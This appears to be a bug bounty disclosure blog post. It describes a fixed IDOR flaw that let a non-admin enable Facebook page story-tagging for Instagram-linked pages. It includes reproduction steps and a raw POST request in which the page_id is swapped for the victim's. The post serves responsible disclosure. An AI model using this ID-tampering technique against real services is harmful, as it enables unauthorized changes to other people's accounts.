[IDOR ] enable “Allow Facebook stories shared from Instagram to tag my page “ as non admin

Aug 22, 2021

Product Area

Facebook-web

Description/impact

unauthorized users can enable setting in pages Which have a Linked Instagram account this setting allow an admins to choose if they want to enable or disable facebook stories shared from Instagram to tag their page

Impact

An attacher was able to Enable “Allow facebook stories shared from Instagram to tag my page as non admin”

Reproductions Steps:

1.Attacker go to m.facebook.com/pages/edit/général

2.Enable setting “facebook stories shared from Instagram to tag my page" and catch the request

POST /pages/profile/stories/tag_megaphone/update/?

Page_id=[page victim id]&enable=true HTTP/1.1

Host:m.facebook.com

Cookie:[require cookie parametre]

3.change the page_id to victim page_id and send the request

Time-line

08/05/2021:Report sent

18/05/2021:Acknowledged by facebook security team

11/06/2021: Fixed by facebook

09/07/2021:Bounty awarded

Follow me:

https://twitter.com/mohamedlaajimi3?t=PP1By_jgDY81B1j7lrT-6A&s=09

[IDOR ] enable “Allow Facebook stories shared from Instagram to tag my page “ as non admin

Product Area

Description/impact

Impact

Reproductions Steps:

Written by Mohamed Laajimi